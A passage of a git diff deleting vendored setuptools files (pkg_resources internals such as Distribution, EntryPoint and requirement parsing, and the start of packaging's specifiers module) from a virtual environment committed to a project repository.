subitem.lower().endswith('.dist-info'): - subpath = os.path.join(path_item, subitem) - submeta = EggMetadata(zipimport.zipimporter(subpath)) - submeta.egg_info = subpath - yield Distribution.from_location(path_item, subitem, submeta) - - -register_finder(zipimport.zipimporter, find_eggs_in_zip) - - -def find_nothing(importer, path_item, only=False): - return () - - -register_finder(object, find_nothing) - - -def _by_version_descending(names): - """ - Given a list of filenames, return them in descending order - by version number. - - >>> names = 'bar', 'foo', 'Python-2.7.10.egg', 'Python-2.7.2.egg' - >>> _by_version_descending(names) - ['Python-2.7.10.egg', 'Python-2.7.2.egg', 'foo', 'bar'] - >>> names = 'Setuptools-1.2.3b1.egg', 'Setuptools-1.2.3.egg' - >>> _by_version_descending(names) - ['Setuptools-1.2.3.egg', 'Setuptools-1.2.3b1.egg'] - >>> names = 'Setuptools-1.2.3b1.egg', 'Setuptools-1.2.3.post1.egg' - >>> _by_version_descending(names) - ['Setuptools-1.2.3.post1.egg', 'Setuptools-1.2.3b1.egg'] - """ - def _by_version(name): - """ - Parse each component of the filename - """ - name, ext = os.path.splitext(name) - parts = itertools.chain(name.split('-'), [ext]) - return [packaging.version.parse(part) for part in parts] - - return sorted(names, key=_by_version, reverse=True) - - -def find_on_path(importer, path_item, only=False): - """Yield distributions accessible on a sys.path directory""" - path_item = _normalize_cached(path_item) - - if _is_unpacked_egg(path_item): - yield Distribution.from_filename( - path_item, metadata=PathMetadata( - path_item, os.path.join(path_item, 'EGG-INFO') - ) - ) - return - - entries = safe_listdir(path_item) - - # for performance, before sorting by version, - # screen entries for only those that will yield - # distributions - filtered = ( - entry - for entry in entries - if dist_factory(path_item, entry, only) - ) - - # scan for .egg and .egg-info in directory - path_item_entries = _by_version_descending(filtered) - for entry in path_item_entries: - fullpath = os.path.join(path_item, entry) - factory = dist_factory(path_item, entry, only) - for dist in factory(fullpath): - yield dist - - -def dist_factory(path_item, entry, only): - """ - Return a dist_factory for a path_item and entry - """ - lower = entry.lower() - is_meta = any(map(lower.endswith, ('.egg-info', '.dist-info'))) - return ( - distributions_from_metadata - if is_meta else - find_distributions - if not only and _is_egg_path(entry) else - resolve_egg_link - if not only and lower.endswith('.egg-link') else - NoDists() - ) - - -class NoDists: - """ - >>> bool(NoDists()) - False - - >>> list(NoDists()('anything')) - [] - """ - def __bool__(self): - return False - if six.PY2: - __nonzero__ = __bool__ - - def __call__(self, fullpath): - return iter(()) - - -def safe_listdir(path): - """ - Attempt to list contents of path, but suppress some exceptions. - """ - try: - return os.listdir(path) - except (PermissionError, NotADirectoryError): - pass - except OSError as e: - # Ignore the directory if does not exist, not a directory or - # permission denied - ignorable = ( - e.errno in (errno.ENOTDIR, errno.EACCES, errno.ENOENT) - # Python 2 on Windows needs to be handled this way :( - or getattr(e, "winerror", None) == 267 - ) - if not ignorable: - raise - return () - - -def distributions_from_metadata(path): - root = os.path.dirname(path) - if os.path.isdir(path): - if len(os.listdir(path)) == 0: - # empty metadata dir; skip - return - metadata = PathMetadata(root, path) - else: - metadata = FileMetadata(path) - entry = os.path.basename(path) - yield Distribution.from_location( - root, entry, metadata, precedence=DEVELOP_DIST, - ) - - -def non_empty_lines(path): - """ - Yield non-empty lines from file at path - """ - with open(path) as f: - for line in f: - line = line.strip() - if line: - yield line - - -def resolve_egg_link(path): - """ - Given a path to an .egg-link, resolve distributions - present in the referenced path. - """ - referenced_paths = non_empty_lines(path) - resolved_paths = ( - os.path.join(os.path.dirname(path), ref) - for ref in referenced_paths - ) - dist_groups = map(find_distributions, resolved_paths) - return next(dist_groups, ()) - - -register_finder(pkgutil.ImpImporter, find_on_path) - -if hasattr(importlib_machinery, 'FileFinder'): - register_finder(importlib_machinery.FileFinder, find_on_path) - -_declare_state('dict', _namespace_handlers={}) -_declare_state('dict', _namespace_packages={}) - - -def register_namespace_handler(importer_type, namespace_handler): - """Register `namespace_handler` to declare namespace packages - - `importer_type` is the type or class of a PEP 302 "Importer" (sys.path item - handler), and `namespace_handler` is a callable like this:: - - def namespace_handler(importer, path_entry, moduleName, module): - # return a path_entry to use for child packages - - Namespace handlers are only called if the importer object has already - agreed that it can handle the relevant path item, and they should only - return a subpath if the module __path__ does not already contain an - equivalent subpath. For an example namespace handler, see - ``pkg_resources.file_ns_handler``. - """ - _namespace_handlers[importer_type] = namespace_handler - - -def _handle_ns(packageName, path_item): - """Ensure that named package includes a subpath of path_item (if needed)""" - - importer = get_importer(path_item) - if importer is None: - return None - - # capture warnings due to #1111 - with warnings.catch_warnings(): - warnings.simplefilter("ignore") - loader = importer.find_module(packageName) - - if loader is None: - return None - module = sys.modules.get(packageName) - if module is None: - module = sys.modules[packageName] = types.ModuleType(packageName) - module.__path__ = [] - _set_parent_ns(packageName) - elif not hasattr(module, '__path__'): - raise TypeError("Not a package:", packageName) - handler = _find_adapter(_namespace_handlers, importer) - subpath = handler(importer, path_item, packageName, module) - if subpath is not None: - path = module.__path__ - path.append(subpath) - loader.load_module(packageName) - _rebuild_mod_path(path, packageName, module) - return subpath - - -def _rebuild_mod_path(orig_path, package_name, module): - """ - Rebuild module.__path__ ensuring that all entries are ordered - corresponding to their sys.path order - """ - sys_path = [_normalize_cached(p) for p in sys.path] - - def safe_sys_path_index(entry): - """ - Workaround for #520 and #513. - """ - try: - return sys_path.index(entry) - except ValueError: - return float('inf') - - def position_in_sys_path(path): - """ - Return the ordinal of the path based on its position in sys.path - """ - path_parts = path.split(os.sep) - module_parts = package_name.count('.') + 1 - parts = path_parts[:-module_parts] - return safe_sys_path_index(_normalize_cached(os.sep.join(parts))) - - new_path = sorted(orig_path, key=position_in_sys_path) - new_path = [_normalize_cached(p) for p in new_path] - - if isinstance(module.__path__, list): - module.__path__[:] = new_path - else: - module.__path__ = new_path - - -def declare_namespace(packageName): - """Declare that package 'packageName' is a namespace package""" - - _imp.acquire_lock() - try: - if packageName in _namespace_packages: - return - - path = sys.path - parent, _, _ = packageName.rpartition('.') - - if parent: - declare_namespace(parent) - if parent not in _namespace_packages: - __import__(parent) - try: - path = sys.modules[parent].__path__ - except AttributeError: - raise TypeError("Not a package:", parent) - - # Track what packages are namespaces, so when new path items are added, - # they can be updated - _namespace_packages.setdefault(parent or None, []).append(packageName) - _namespace_packages.setdefault(packageName, []) - - for path_item in path: - # Ensure all the parent's path items are reflected in the child, - # if they apply - _handle_ns(packageName, path_item) - - finally: - _imp.release_lock() - - -def fixup_namespace_packages(path_item, parent=None): - """Ensure that previously-declared namespace packages include path_item""" - _imp.acquire_lock() - try: - for package in _namespace_packages.get(parent, ()): - subpath = _handle_ns(package, path_item) - if subpath: - fixup_namespace_packages(subpath, package) - finally: - _imp.release_lock() - - -def file_ns_handler(importer, path_item, packageName, module): - """Compute an ns-package subpath for a filesystem or zipfile importer""" - - subpath = os.path.join(path_item, packageName.split('.')[-1]) - normalized = _normalize_cached(subpath) - for item in module.__path__: - if _normalize_cached(item) == normalized: - break - else: - # Only return the path if it's not already there - return subpath - - -register_namespace_handler(pkgutil.ImpImporter, file_ns_handler) -register_namespace_handler(zipimport.zipimporter, file_ns_handler) - -if hasattr(importlib_machinery, 'FileFinder'): - register_namespace_handler(importlib_machinery.FileFinder, file_ns_handler) - - -def null_ns_handler(importer, path_item, packageName, module): - return None - - -register_namespace_handler(object, null_ns_handler) - - -def normalize_path(filename): - """Normalize a file/dir name for comparison purposes""" - return os.path.normcase(os.path.realpath(os.path.normpath(_cygwin_patch(filename)))) - - -def _cygwin_patch(filename): # pragma: nocover - """ - Contrary to POSIX 2008, on Cygwin, getcwd (3) contains - symlink components. Using - os.path.abspath() works around this limitation. A fix in os.getcwd() - would probably better, in Cygwin even more so, except - that this seems to be by design... - """ - return os.path.abspath(filename) if sys.platform == 'cygwin' else filename - - -def _normalize_cached(filename, _cache={}): - try: - return _cache[filename] - except KeyError: - _cache[filename] = result = normalize_path(filename) - return result - - -def _is_egg_path(path): - """ - Determine if given path appears to be an egg. - """ - return path.lower().endswith('.egg') - - -def _is_unpacked_egg(path): - """ - Determine if given path appears to be an unpacked egg. - """ - return ( - _is_egg_path(path) and - os.path.isfile(os.path.join(path, 'EGG-INFO', 'PKG-INFO')) - ) - - -def _set_parent_ns(packageName): - parts = packageName.split('.') - name = parts.pop() - if parts: - parent = '.'.join(parts) - setattr(sys.modules[parent], name, sys.modules[packageName]) - - -def yield_lines(strs): - """Yield non-empty/non-comment lines of a string or sequence""" - if isinstance(strs, six.string_types): - for s in strs.splitlines(): - s = s.strip() - # skip blank lines/comments - if s and not s.startswith('#'): - yield s - else: - for ss in strs: - for s in yield_lines(ss): - yield s - - -MODULE = re.compile(r"\w+(\.\w+)*$").match -EGG_NAME = re.compile( - r""" - (?P[^-]+) ( - -(?P[^-]+) ( - -py(?P[^-]+) ( - -(?P.+) - )? - )? - )? - """, - re.VERBOSE | re.IGNORECASE, -).match - - -class EntryPoint: - """Object representing an advertised importable object""" - - def __init__(self, name, module_name, attrs=(), extras=(), dist=None): - if not MODULE(module_name): - raise ValueError("Invalid module name", module_name) - self.name = name - self.module_name = module_name - self.attrs = tuple(attrs) - self.extras = tuple(extras) - self.dist = dist - - def __str__(self): - s = "%s = %s" % (self.name, self.module_name) - if self.attrs: - s += ':' + '.'.join(self.attrs) - if self.extras: - s += ' [%s]' % ','.join(self.extras) - return s - - def __repr__(self): - return "EntryPoint.parse(%r)" % str(self) - - def load(self, require=True, *args, **kwargs): - """ - Require packages for this EntryPoint, then resolve it. - """ - if not require or args or kwargs: - warnings.warn( - "Parameters to load are deprecated. Call .resolve and " - ".require separately.", - PkgResourcesDeprecationWarning, - stacklevel=2, - ) - if require: - self.require(*args, **kwargs) - return self.resolve() - - def resolve(self): - """ - Resolve the entry point from its module and attrs. - """ - module = __import__(self.module_name, fromlist=['__name__'], level=0) - try: - return functools.reduce(getattr, self.attrs, module) - except AttributeError as exc: - raise ImportError(str(exc)) - - def require(self, env=None, installer=None): - if self.extras and not self.dist: - raise UnknownExtra("Can't require() without a distribution", self) - - # Get the requirements for this entry point with all its extras and - # then resolve them. We have to pass `extras` along when resolving so - # that the working set knows what extras we want. Otherwise, for - # dist-info distributions, the working set will assume that the - # requirements for that extra are purely optional and skip over them. - reqs = self.dist.requires(self.extras) - items = working_set.resolve(reqs, env, installer, extras=self.extras) - list(map(working_set.add, items)) - - pattern = re.compile( - r'\s*' - r'(?P.+?)\s*' - r'=\s*' - r'(?P[\w.]+)\s*' - r'(:\s*(?P[\w.]+))?\s*' - r'(?P\[.*\])?\s*$' - ) - - @classmethod - def parse(cls, src, dist=None): - """Parse a single entry point from string `src` - - Entry point syntax follows the form:: - - name = some.module:some.attr [extra1, extra2] - - The entry name and module name are required, but the ``:attrs`` and - ``[extras]`` parts are optional - """ - m = cls.pattern.match(src) - if not m: - msg = "EntryPoint must be in 'name=module:attrs [extras]' format" - raise ValueError(msg, src) - res = m.groupdict() - extras = cls._parse_extras(res['extras']) - attrs = res['attr'].split('.') if res['attr'] else () - return cls(res['name'], res['module'], attrs, extras, dist) - - @classmethod - def _parse_extras(cls, extras_spec): - if not extras_spec: - return () - req = Requirement.parse('x' + extras_spec) - if req.specs: - raise ValueError() - return req.extras - - @classmethod - def parse_group(cls, group, lines, dist=None): - """Parse an entry point group""" - if not MODULE(group): - raise ValueError("Invalid group name", group) - this = {} - for line in yield_lines(lines): - ep = cls.parse(line, dist) - if ep.name in this: - raise ValueError("Duplicate entry point", group, ep.name) - this[ep.name] = ep - return this - - @classmethod - def parse_map(cls, data, dist=None): - """Parse a map of entry point groups""" - if isinstance(data, dict): - data = data.items() - else: - data = split_sections(data) - maps = {} - for group, lines in data: - if group is None: - if not lines: - continue - raise ValueError("Entry points must be listed in groups") - group = group.strip() - if group in maps: - raise ValueError("Duplicate group name", group) - maps[group] = cls.parse_group(group, lines, dist) - return maps - - -def _remove_md5_fragment(location): - if not location: - return '' - parsed = urllib.parse.urlparse(location) - if parsed[-1].startswith('md5='): - return urllib.parse.urlunparse(parsed[:-1] + ('',)) - return location - - -def _version_from_file(lines): - """ - Given an iterable of lines from a Metadata file, return - the value of the Version field, if present, or None otherwise. - """ - def is_version_line(line): - return line.lower().startswith('version:') - version_lines = filter(is_version_line, lines) - line = next(iter(version_lines), '') - _, _, value = line.partition(':') - return safe_version(value.strip()) or None - - -class Distribution: - """Wrap an actual or potential sys.path entry w/metadata""" - PKG_INFO = 'PKG-INFO' - - def __init__( - self, location=None, metadata=None, project_name=None, - version=None, py_version=PY_MAJOR, platform=None, - precedence=EGG_DIST): - self.project_name = safe_name(project_name or 'Unknown') - if version is not None: - self._version = safe_version(version) - self.py_version = py_version - self.platform = platform - self.location = location - self.precedence = precedence - self._provider = metadata or empty_provider - - @classmethod - def from_location(cls, location, basename, metadata=None, **kw): - project_name, version, py_version, platform = [None] * 4 - basename, ext = os.path.splitext(basename) - if ext.lower() in _distributionImpl: - cls = _distributionImpl[ext.lower()] - - match = EGG_NAME(basename) - if match: - project_name, version, py_version, platform = match.group( - 'name', 'ver', 'pyver', 'plat' - ) - return cls( - location, metadata, project_name=project_name, version=version, - py_version=py_version, platform=platform, **kw - )._reload_version() - - def _reload_version(self): - return self - - @property - def hashcmp(self): - return ( - self.parsed_version, - self.precedence, - self.key, - _remove_md5_fragment(self.location), - self.py_version or '', - self.platform or '', - ) - - def __hash__(self): - return hash(self.hashcmp) - - def __lt__(self, other): - return self.hashcmp < other.hashcmp - - def __le__(self, other): - return self.hashcmp <= other.hashcmp - - def __gt__(self, other): - return self.hashcmp > other.hashcmp - - def __ge__(self, other): - return self.hashcmp >= other.hashcmp - - def __eq__(self, other): - if not isinstance(other, self.__class__): - # It's not a Distribution, so they are not equal - return False - return self.hashcmp == other.hashcmp - - def __ne__(self, other): - return not self == other - - # These properties have to be lazy so that we don't have to load any - # metadata until/unless it's actually needed. (i.e., some distributions - # may not know their name or version without loading PKG-INFO) - - @property - def key(self): - try: - return self._key - except AttributeError: - self._key = key = self.project_name.lower() - return key - - @property - def parsed_version(self): - if not hasattr(self, "_parsed_version"): - self._parsed_version = parse_version(self.version) - - return self._parsed_version - - def _warn_legacy_version(self): - LV = packaging.version.LegacyVersion - is_legacy = isinstance(self._parsed_version, LV) - if not is_legacy: - return - - # While an empty version is technically a legacy version and - # is not a valid PEP 440 version, it's also unlikely to - # actually come from someone and instead it is more likely that - # it comes from setuptools attempting to parse a filename and - # including it in the list. So for that we'll gate this warning - # on if the version is anything at all or not. - if not self.version: - return - - tmpl = textwrap.dedent(""" - '{project_name} ({version})' is being parsed as a legacy, - non PEP 440, - version. You may find odd behavior and sort order. - In particular it will be sorted as less than 0.0. It - is recommended to migrate to PEP 440 compatible - versions. - """).strip().replace('\n', ' ') - - warnings.warn(tmpl.format(**vars(self)), PEP440Warning) - - @property - def version(self): - try: - return self._version - except AttributeError: - version = self._get_version() - if version is None: - path = self._get_metadata_path_for_display(self.PKG_INFO) - msg = ( - "Missing 'Version:' header and/or {} file at path: {}" - ).format(self.PKG_INFO, path) - raise ValueError(msg, self) - - return version - - @property - def _dep_map(self): - """ - A map of extra to its list of (direct) requirements - for this distribution, including the null extra. - """ - try: - return self.__dep_map - except AttributeError: - self.__dep_map = self._filter_extras(self._build_dep_map()) - return self.__dep_map - - @staticmethod - def _filter_extras(dm): - """ - Given a mapping of extras to dependencies, strip off - environment markers and filter out any dependencies - not matching the markers. - """ - for extra in list(filter(None, dm)): - new_extra = extra - reqs = dm.pop(extra) - new_extra, _, marker = extra.partition(':') - fails_marker = marker and ( - invalid_marker(marker) - or not evaluate_marker(marker) - ) - if fails_marker: - reqs = [] - new_extra = safe_extra(new_extra) or None - - dm.setdefault(new_extra, []).extend(reqs) - return dm - - def _build_dep_map(self): - dm = {} - for name in 'requires.txt', 'depends.txt': - for extra, reqs in split_sections(self._get_metadata(name)): - dm.setdefault(extra, []).extend(parse_requirements(reqs)) - return dm - - def requires(self, extras=()): - """List of Requirements needed for this distro if `extras` are used""" - dm = self._dep_map - deps = [] - deps.extend(dm.get(None, ())) - for ext in extras: - try: - deps.extend(dm[safe_extra(ext)]) - except KeyError: - raise UnknownExtra( - "%s has no such extra feature %r" % (self, ext) - ) - return deps - - def _get_metadata_path_for_display(self, name): - """ - Return the path to the given metadata file, if available. - """ - try: - # We need to access _get_metadata_path() on the provider object - # directly rather than through this class's __getattr__() - # since _get_metadata_path() is marked private. - path = self._provider._get_metadata_path(name) - - # Handle exceptions e.g. in case the distribution's metadata - # provider doesn't support _get_metadata_path(). - except Exception: - return '[could not detect]' - - return path - - def _get_metadata(self, name): - if self.has_metadata(name): - for line in self.get_metadata_lines(name): - yield line - - def _get_version(self): - lines = self._get_metadata(self.PKG_INFO) - version = _version_from_file(lines) - - return version - - def activate(self, path=None, replace=False): - """Ensure distribution is importable on `path` (default=sys.path)""" - if path is None: - path = sys.path - self.insert_on(path, replace=replace) - if path is sys.path: - fixup_namespace_packages(self.location) - for pkg in self._get_metadata('namespace_packages.txt'): - if pkg in sys.modules: - declare_namespace(pkg) - - def egg_name(self): - """Return what this distribution's standard .egg filename should be""" - filename = "%s-%s-py%s" % ( - to_filename(self.project_name), to_filename(self.version), - self.py_version or PY_MAJOR - ) - - if self.platform: - filename += '-' + self.platform - return filename - - def __repr__(self): - if self.location: - return "%s (%s)" % (self, self.location) - else: - return str(self) - - def __str__(self): - try: - version = getattr(self, 'version', None) - except ValueError: - version = None - version = version or "[unknown version]" - return "%s %s" % (self.project_name, version) - - def __getattr__(self, attr): - """Delegate all unrecognized public attributes to .metadata provider""" - if attr.startswith('_'): - raise AttributeError(attr) - return getattr(self._provider, attr) - - def __dir__(self): - return list( - set(super(Distribution, self).__dir__()) - | set( - attr for attr in self._provider.__dir__() - if not attr.startswith('_') - ) - ) - - if not hasattr(object, '__dir__'): - # python 2.7 not supported - del __dir__ - - @classmethod - def from_filename(cls, filename, metadata=None, **kw): - return cls.from_location( - _normalize_cached(filename), os.path.basename(filename), metadata, - **kw - ) - - def as_requirement(self): - """Return a ``Requirement`` that matches this distribution exactly""" - if isinstance(self.parsed_version, packaging.version.Version): - spec = "%s==%s" % (self.project_name, self.parsed_version) - else: - spec = "%s===%s" % (self.project_name, self.parsed_version) - - return Requirement.parse(spec) - - def load_entry_point(self, group, name): - """Return the `name` entry point of `group` or raise ImportError""" - ep = self.get_entry_info(group, name) - if ep is None: - raise ImportError("Entry point %r not found" % ((group, name),)) - return ep.load() - - def get_entry_map(self, group=None): - """Return the entry point map for `group`, or the full entry map""" - try: - ep_map = self._ep_map - except AttributeError: - ep_map = self._ep_map = EntryPoint.parse_map( - self._get_metadata('entry_points.txt'), self - ) - if group is not None: - return ep_map.get(group, {}) - return ep_map - - def get_entry_info(self, group, name): - """Return the EntryPoint object for `group`+`name`, or ``None``""" - return self.get_entry_map(group).get(name) - - def insert_on(self, path, loc=None, replace=False): - """Ensure self.location is on path - - If replace=False (default): - - If location is already in path anywhere, do nothing. - - Else: - - If it's an egg and its parent directory is on path, - insert just ahead of the parent. - - Else: add to the end of path. - If replace=True: - - If location is already on path anywhere (not eggs) - or higher priority than its parent (eggs) - do nothing. - - Else: - - If it's an egg and its parent directory is on path, - insert just ahead of the parent, - removing any lower-priority entries. - - Else: add it to the front of path. - """ - - loc = loc or self.location - if not loc: - return - - nloc = _normalize_cached(loc) - bdir = os.path.dirname(nloc) - npath = [(p and _normalize_cached(p) or p) for p in path] - - for p, item in enumerate(npath): - if item == nloc: - if replace: - break - else: - # don't modify path (even removing duplicates) if - # found and not replace - return - elif item == bdir and self.precedence == EGG_DIST: - # if it's an .egg, give it precedence over its directory - # UNLESS it's already been added to sys.path and replace=False - if (not replace) and nloc in npath[p:]: - return - if path is sys.path: - self.check_version_conflict() - path.insert(p, loc) - npath.insert(p, nloc) - break - else: - if path is sys.path: - self.check_version_conflict() - if replace: - path.insert(0, loc) - else: - path.append(loc) - return - - # p is the spot where we found or inserted loc; now remove duplicates - while True: - try: - np = npath.index(nloc, p + 1) - except ValueError: - break - else: - del npath[np], path[np] - # ha! - p = np - - return - - def check_version_conflict(self): - if self.key == 'setuptools': - # ignore the inevitable setuptools self-conflicts :( - return - - nsp = dict.fromkeys(self._get_metadata('namespace_packages.txt')) - loc = normalize_path(self.location) - for modname in self._get_metadata('top_level.txt'): - if (modname not in sys.modules or modname in nsp - or modname in _namespace_packages): - continue - if modname in ('pkg_resources', 'setuptools', 'site'): - continue - fn = getattr(sys.modules[modname], '__file__', None) - if fn and (normalize_path(fn).startswith(loc) or - fn.startswith(self.location)): - continue - issue_warning( - "Module %s was already imported from %s, but %s is being added" - " to sys.path" % (modname, fn, self.location), - ) - - def has_version(self): - try: - self.version - except ValueError: - issue_warning("Unbuilt egg for " + repr(self)) - return False - return True - - def clone(self, **kw): - """Copy this distribution, substituting in any changed keyword args""" - names = 'project_name version py_version platform location precedence' - for attr in names.split(): - kw.setdefault(attr, getattr(self, attr, None)) - kw.setdefault('metadata', self._provider) - return self.__class__(**kw) - - @property - def extras(self): - return [dep for dep in self._dep_map if dep] - - -class EggInfoDistribution(Distribution): - def _reload_version(self): - """ - Packages installed by distutils (e.g. numpy or scipy), - which uses an old safe_version, and so - their version numbers can get mangled when - converted to filenames (e.g., 1.11.0.dev0+2329eae to - 1.11.0.dev0_2329eae). These distributions will not be - parsed properly - downstream by Distribution and safe_version, so - take an extra step and try to get the version number from - the metadata file itself instead of the filename. - """ - md_version = self._get_version() - if md_version: - self._version = md_version - return self - - -class DistInfoDistribution(Distribution): - """ - Wrap an actual or potential sys.path entry - w/metadata, .dist-info style. - """ - PKG_INFO = 'METADATA' - EQEQ = re.compile(r"([\(,])\s*(\d.*?)\s*([,\)])") - - @property - def _parsed_pkg_info(self): - """Parse and cache metadata""" - try: - return self._pkg_info - except AttributeError: - metadata = self.get_metadata(self.PKG_INFO) - self._pkg_info = email.parser.Parser().parsestr(metadata) - return self._pkg_info - - @property - def _dep_map(self): - try: - return self.__dep_map - except AttributeError: - self.__dep_map = self._compute_dependencies() - return self.__dep_map - - def _compute_dependencies(self): - """Recompute this distribution's dependencies.""" - dm = self.__dep_map = {None: []} - - reqs = [] - # Including any condition expressions - for req in self._parsed_pkg_info.get_all('Requires-Dist') or []: - reqs.extend(parse_requirements(req)) - - def reqs_for_extra(extra): - for req in reqs: - if not req.marker or req.marker.evaluate({'extra': extra}): - yield req - - common = frozenset(reqs_for_extra(None)) - dm[None].extend(common) - - for extra in self._parsed_pkg_info.get_all('Provides-Extra') or []: - s_extra = safe_extra(extra.strip()) - dm[s_extra] = list(frozenset(reqs_for_extra(extra)) - common) - - return dm - - -_distributionImpl = { - '.egg': Distribution, - '.egg-info': EggInfoDistribution, - '.dist-info': DistInfoDistribution, -} - - -def issue_warning(*args, **kw): - level = 1 - g = globals() - try: - # find the first stack frame that is *not* code in - # the pkg_resources module, to use for the warning - while sys._getframe(level).f_globals is g: - level += 1 - except ValueError: - pass - warnings.warn(stacklevel=level + 1, *args, **kw) - - -class RequirementParseError(ValueError): - def __str__(self): - return ' '.join(self.args) - - -def parse_requirements(strs): - """Yield ``Requirement`` objects for each specification in `strs` - - `strs` must be a string, or a (possibly-nested) iterable thereof. - """ - # create a steppable iterator, so we can handle \-continuations - lines = iter(yield_lines(strs)) - - for line in lines: - # Drop comments -- a hash without a space may be in a URL. - if ' #' in line: - line = line[:line.find(' #')] - # If there is a line continuation, drop it, and append the next line. - if line.endswith('\\'): - line = line[:-2].strip() - try: - line += next(lines) - except StopIteration: - return - yield Requirement(line) - - -class Requirement(packaging.requirements.Requirement): - def __init__(self, requirement_string): - """DO NOT CALL THIS UNDOCUMENTED METHOD; use Requirement.parse()!""" - try: - super(Requirement, self).__init__(requirement_string) - except packaging.requirements.InvalidRequirement as e: - raise RequirementParseError(str(e)) - self.unsafe_name = self.name - project_name = safe_name(self.name) - self.project_name, self.key = project_name, project_name.lower() - self.specs = [ - (spec.operator, spec.version) for spec in self.specifier] - self.extras = tuple(map(safe_extra, self.extras)) - self.hashCmp = ( - self.key, - self.url, - self.specifier, - frozenset(self.extras), - str(self.marker) if self.marker else None, - ) - self.__hash = hash(self.hashCmp) - - def __eq__(self, other): - return ( - isinstance(other, Requirement) and - self.hashCmp == other.hashCmp - ) - - def __ne__(self, other): - return not self == other - - def __contains__(self, item): - if isinstance(item, Distribution): - if item.key != self.key: - return False - - item = item.version - - # Allow prereleases always in order to match the previous behavior of - # this method. In the future this should be smarter and follow PEP 440 - # more accurately. - return self.specifier.contains(item, prereleases=True) - - def __hash__(self): - return self.__hash - - def __repr__(self): - return "Requirement.parse(%r)" % str(self) - - @staticmethod - def parse(s): - req, = parse_requirements(s) - return req - - -def _always_object(classes): - """ - Ensure object appears in the mro even - for old-style classes. - """ - if object not in classes: - return classes + (object,) - return classes - - -def _find_adapter(registry, ob): - """Return an adapter factory for `ob` from `registry`""" - types = _always_object(inspect.getmro(getattr(ob, '__class__', type(ob)))) - for t in types: - if t in registry: - return registry[t] - - -def ensure_directory(path): - """Ensure that the parent directory of `path` exists""" - dirname = os.path.dirname(path) - py31compat.makedirs(dirname, exist_ok=True) - - -def _bypass_ensure_directory(path): - """Sandbox-bypassing version of ensure_directory()""" - if not WRITE_SUPPORT: - raise IOError('"os.mkdir" not supported on this platform.') - dirname, filename = split(path) - if dirname and filename and not isdir(dirname): - _bypass_ensure_directory(dirname) - try: - mkdir(dirname, 0o755) - except FileExistsError: - pass - - -def split_sections(s): - """Split a string or iterable thereof into (section, content) pairs - - Each ``section`` is a stripped version of the section header ("[section]") - and each ``content`` is a list of stripped lines excluding blank lines and - comment-only lines. If there are any such lines before the first section - header, they're returned in a first ``section`` of ``None``. - """ - section = None - content = [] - for line in yield_lines(s): - if line.startswith("["): - if line.endswith("]"): - if section or content: - yield section, content - section = line[1:-1].strip() - content = [] - else: - raise ValueError("Invalid section heading", line) - else: - content.append(line) - - # wrap up last segment - yield section, content - - -def _mkstemp(*args, **kw): - old_open = os.open - try: - # temporarily bypass sandboxing - os.open = os_open - return tempfile.mkstemp(*args, **kw) - finally: - # and then put it back - os.open = old_open - - -# Silence the PEP440Warning by default, so that end users don't get hit by it -# randomly just because they use pkg_resources. We want to append the rule -# because we want earlier uses of filterwarnings to take precedence over this -# one. -warnings.filterwarnings("ignore", category=PEP440Warning, append=True) - - -# from jaraco.functools 1.3 -def _call_aside(f, *args, **kwargs): - f(*args, **kwargs) - return f - - -@_call_aside -def _initialize(g=globals()): - "Set up global resource manager (deliberately not state-saved)" - manager = ResourceManager() - g['_manager'] = manager - g.update( - (name, getattr(manager, name)) - for name in dir(manager) - if not name.startswith('_') - ) - - -@_call_aside -def _initialize_master_working_set(): - """ - Prepare the master working set and make the ``require()`` - API available. - - This function has explicit effects on the global state - of pkg_resources. It is intended to be invoked once at - the initialization of this module. - - Invocation by other packages is unsupported and done - at their own risk. - """ - working_set = WorkingSet._build_master() - _declare_state('object', working_set=working_set) - - require = working_set.require - iter_entry_points = working_set.iter_entry_points - add_activation_listener = working_set.subscribe - run_script = working_set.run_script - # backward compatibility - run_main = run_script - # Activate all distributions already on sys.path with replace=False and - # ensure that all distributions added to the working set in the future - # (e.g. by calling ``require()``) will get activated as well, - # with higher priority (replace=True). - tuple( - dist.activate(replace=False) - for dist in working_set - ) - add_activation_listener( - lambda dist: dist.activate(replace=True), - existing=False, - ) - working_set.entries = [] - # match order - list(map(working_set.add_entry, sys.path)) - globals().update(locals()) - -class PkgResourcesDeprecationWarning(Warning): - """ - Base class for warning about deprecations in ``pkg_resources`` - - This class is not derived from ``DeprecationWarning``, and as such is - visible by default. - """ diff --git a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pkg_resources/_vendor/packaging/specifiers.py b/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pkg_resources/_vendor/packaging/specifiers.py deleted file mode 100644 index fe09bb1dbb22f7670d33fe4b86ac45e207cc7eb1..0000000000000000000000000000000000000000 --- a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pkg_resources/_vendor/packaging/specifiers.py +++ /dev/null @@ -1,863 +0,0 @@ -# This file is dual licensed under the terms of the Apache License, Version -# 2.0, and the BSD License. See the LICENSE file in the root of this repository -# for complete details. -from __future__ import absolute_import, division, print_function - -import abc -import functools -import itertools -import re - -from ._compat import string_types, with_metaclass -from ._typing import TYPE_CHECKING -from .utils import canonicalize_version -from .version import Version, LegacyVersion, parse - -if TYPE_CHECKING: # pragma: no cover - from typing import ( - List, - Dict, - Union, - Iterable, - Iterator, - Optional, - Callable, - Tuple, - FrozenSet, - ) - - ParsedVersion = Union[Version, LegacyVersion] - UnparsedVersion = Union[Version, LegacyVersion, str] - CallableOperator = Callable[[ParsedVersion, str], bool] - - -class InvalidSpecifier(ValueError): - """ - An invalid specifier was found, users should refer to PEP 440. - """ - - -class BaseSpecifier(with_metaclass(abc.ABCMeta, object)): # type: ignore - @abc.abstractmethod - def __str__(self): - # type: () -> str - """ - Returns the str representation of this Specifier like object. This - should be representative of the Specifier itself. - """ - - @abc.abstractmethod - def __hash__(self): - # type: () -> int - """ - Returns a hash value for this Specifier like object. - """ - - @abc.abstractmethod - def __eq__(self, other): - # type: (object) -> bool - """ - Returns a boolean representing whether or not the two Specifier like - objects are equal. - """ - - @abc.abstractmethod - def __ne__(self, other): - # type: (object) -> bool - """ - Returns a boolean representing whether or not the two Specifier like - objects are not equal. - """ - - @abc.abstractproperty - def prereleases(self): - # type: () -> Optional[bool] - """ - Returns whether or not pre-releases as a whole are allowed by this - specifier. - """ - - @prereleases.setter - def prereleases(self, value): - # type: (bool) -> None - """ - Sets whether or not pre-releases as a whole are allowed by this - specifier. - """ - - @abc.abstractmethod - def contains(self, item, prereleases=None): - # type: (str, Optional[bool]) -> bool - """ - Determines if the given 